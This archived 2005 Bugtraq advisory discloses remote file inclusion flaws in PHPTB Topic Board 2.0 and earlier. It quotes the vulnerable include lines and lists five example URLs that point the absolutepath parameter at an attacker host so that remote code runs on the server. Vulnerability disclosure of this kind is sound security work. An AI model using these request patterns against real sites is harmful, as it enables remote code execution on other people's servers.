lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 17 Aug 2005 10:14:39 -0000
From: goszynskif@...il.com
To: bugtraq@...urityfocus.com
Subject: PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities


   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: PHPTB Topic Board - Multiple PHP injection
                             vulnerabilities
   Version <= 2.0
   Homepage: htt://www.phptb.com/

   Author: Filip Groszyński (VXSfx)
   Date: 17 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

     PHPTB Topic Borad is an open source portal system. 
     However, an input validation flaw can cause malicious
     attackers to remote code execution on the web server.

   --------------------------------------------------------
   
   Vulnerable code exist in ./classes/admin_o.php,
                            ./classes/board_o.php,
                            ./classes/dev_o.php,
                            ./classes/file_o.php and
                            ./classes/tech_o.php:
  <?php
	include $absolutepath.'classes/smart_o.php';
   ... EOF

   Over that I found vulnerable code in ./classes/dev_o.php and
                                        ./classes/tech_o.php:

   ...
        require $GLOBALS['absolutepath'].'userpass.php';
   ... EOF
  
   --------------------------------------------------------

   Examples:

       http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif gmail com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --


Powered by blists - more mailing lists